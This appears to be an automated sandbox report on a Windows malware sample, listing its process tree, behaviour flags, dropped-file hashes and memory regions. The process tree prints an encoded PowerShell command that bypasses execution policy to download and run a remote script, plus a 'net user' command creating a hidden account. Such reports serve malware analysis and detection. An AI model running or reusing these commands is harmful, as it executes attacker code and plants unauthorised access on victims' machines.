C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.dllMD5
5c3fdd6eb3167f53dacd21e58e25d6e9
SHA1e2b1b2126e0deac5d3add3ed0c17a4f35a35a479
SHA256972fd325be916b158c5611680d2f4fc7641f4251a31cae6d87cd49eca596ac37
SHA51294902f796a93e3b10001659a74a586ce52b6b749563e5fd9d100837d3c49cd608bc84a27177b3af5fecce253fadb3ae8df3c1ddb5bfb2c5f2d858ebebf8115a0
-
C:\Users\Admin\AppData\Local\Temp\RES6420.tmpMD5
456728124e35c03040fa9bf6dc028db8
SHA1192c11879fe9e814389174d53712ad71f2bb32a4
SHA25623724a98affdaa4dad082ba411b706fd757db96360a1addb0d5a4fca53749d28
SHA51273a645477eaeb6d2c3c0802948ee8262c8f9c069184182a3066b0ca55798fc41543e813ee5105a89e305153d8d3e704aa7c19126f0034326f1108dc5b0701117
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.cmdlineMD5
7a1d2b78fb3a4498747ded0951eecd75
SHA1c9330558337873d3461b2e7b4042534b2e1e800a
SHA256d2b84931663e6da0a36a8e70be2d68b255acacab9ca22e87b82449cacd2d17c7
SHA512f593c7b99593c39742876687fc7879b59537f9cfe1559c3c27aa71ce44e63602ce99863cccf824ee92028e6114b5daef0e64a13ae7e6c5cdba11d75e730e0c34
-
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\CSCECA57343D3A14B89AA49B14023A79037.TMPMD5
365e313cfc24df35586eddddcfd4abe5
SHA1f53aecdadb712480ad027609832f8a9af59f76e6
SHA2567258db462d4cff2b45fcd1533cd406e298bfd3a2345bf285a6171ef8fc17c185
SHA5123ef3982ff4556d06117a310d69773822348c3c8419cce55df684ab3033bbd4076b828eb15789a938dc2ab36812640313f0753dfe617815d07bdc99285e853692
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/304-76-0x0000000000000000-mapping.dmp
-
memory/332-55-0x0000000000000000-mapping.dmp
-
memory/344-64-0x0000000000000000-mapping.dmp
-
memory/388-43-0x0000000000000000-mapping.dmp
-
memory/472-58-0x0000000000000000-mapping.dmp
-
memory/556-56-0x0000000000000000-mapping.dmp
-
memory/580-57-0x0000000000000000-mapping.dmp
-
memory/636-117-0x0000000000000000-mapping.dmp
-
memory/656-63-0x0000000000000000-mapping.dmp
-
memory/816-62-0x0000000000000000-mapping.dmp
-
memory/820-40-0x0000000000000000-mapping.dmp
-
memory/872-72-0x0000000000000000-mapping.dmp
-
memory/928-39-0x0000000000000000-mapping.dmp
-
memory/948-86-0x0000000000000000-mapping.dmp
-
memory/1084-13-0x0000000000000000-mapping.dmp
-
memory/1084-53-0x0000000000000000-mapping.dmp
-
memory/1092-54-0x0000000000000000-mapping.dmp
-
memory/1096-78-0x0000000000000000-mapping.dmp
-
memory/1096-69-0x0000000000000000-mapping.dmp
-
memory/1100-52-0x0000000000000000-mapping.dmp
-
memory/1168-36-0x0000000000000000-mapping.dmp
-
memory/1268-48-0x0000000000000000-mapping.dmp
-
memory/1268-68-0x0000000000000000-mapping.dmp
-
memory/1324-61-0x0000000000000000-mapping.dmp
-
memory/1520-21-0x00000000027E0000-0x00000000027E1000-memory.dmpFilesize
4KB
-
memory/1520-35-0x0000000024620000-0x0000000024621000-memory.dmpFilesize
4KB
-
memory/1520-6-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1520-17-0x0000000002270000-0x0000000002271000-memory.dmpFilesize
4KB
-
memory/1520-38-0x0000000002300000-0x0000000002310000-memory.dmpFilesize
64KB
-
memory/1520-18-0x0000000002610000-0x0000000002611000-memory.dmpFilesize
4KB
-
memory/1520-3-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmpFilesize
9.9MB
-
memory/1520-2-0x0000000000000000-mapping.dmp
-
memory/1520-5-0x000000001ACF0000-0x000000001ACF1000-memory.dmpFilesize
4KB
-
memory/1520-9-0x000000001C140000-0x000000001C141000-memory.dmpFilesize
4KB
-
memory/1520-7-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB
-
memory/1520-4-0x0000000002370000-0x0000000002371000-memory.dmpFilesize
4KB
-
memory/1520-34-0x0000000002340000-0x0000000002341000-memory.dmpFilesize
4KB
-
memory/1520-33-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/1524-80-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmpFilesize
9.9MB
-
memory/1524-97-0x0000000000F40000-0x0000000000F41000-memory.dmpFilesize
4KB
-
memory/1524-87-0x0000000000B00000-0x0000000000B01000-memory.dmpFilesize
4KB
-
memory/1524-115-0x000000001ABF0000-0x000000001ABF1000-memory.dmpFilesize
4KB
-
memory/1524-114-0x00000000010F0000-0x00000000010F1000-memory.dmpFilesize
4KB
-
memory/1524-107-0x000000001AB60000-0x000000001AB61000-memory.dmpFilesize
4KB
-
memory/1524-106-0x000000001A060000-0x000000001A061000-memory.dmpFilesize
4KB
-
memory/1524-99-0x0000000001050000-0x0000000001051000-memory.dmpFilesize
4KB
-
memory/1524-98-0x0000000000EB0000-0x0000000000EB1000-memory.dmpFilesize
4KB
-
memory/1524-79-0x0000000000000000-mapping.dmp
-
memory/1524-90-0x0000000019EA0000-0x0000000019EA1000-memory.dmpFilesize
4KB
-
memory/1524-96-0x0000000000EA0000-0x0000000000EA1000-memory.dmpFilesize
4KB
-
memory/1524-95-0x0000000000B20000-0x0000000000B21000-memory.dmpFilesize
4KB
-
memory/1584-85-0x0000000000000000-mapping.dmp
-
memory/1592-45-0x0000000000000000-mapping.dmp
-
memory/1596-44-0x0000000000000000-mapping.dmp
-
memory/1596-66-0x0000000000000000-mapping.dmp
-
memory/1612-49-0x0000000000000000-mapping.dmp
-
memory/1640-1-0x00000000025A0000-0x00000000025B1000-memory.dmpFilesize
68KB
-
memory/1640-0-0x0000000002260000-0x000000000259D000-memory.dmpFilesize
3.2MB
-
memory/1648-51-0x0000000000000000-mapping.dmp
-
memory/1684-46-0x0000000000000000-mapping.dmp
-
memory/1688-70-0x0000000000000000-mapping.dmp
-
memory/1688-10-0x0000000000000000-mapping.dmp
-
memory/1692-65-0x0000000000000000-mapping.dmp
-
memory/1744-71-0x0000000000000000-mapping.dmp
-
memory/1752-47-0x0000000000000000-mapping.dmp
-
memory/1780-42-0x0000000000000000-mapping.dmp
-
memory/1780-77-0x0000000000000000-mapping.dmp
-
memory/1820-73-0x0000000000000000-mapping.dmp
-
memory/1892-41-0x0000000000000000-mapping.dmp
-
memory/1940-116-0x0000000000000000-mapping.dmp
-
memory/2008-50-0x0000000000000000-mapping.dmp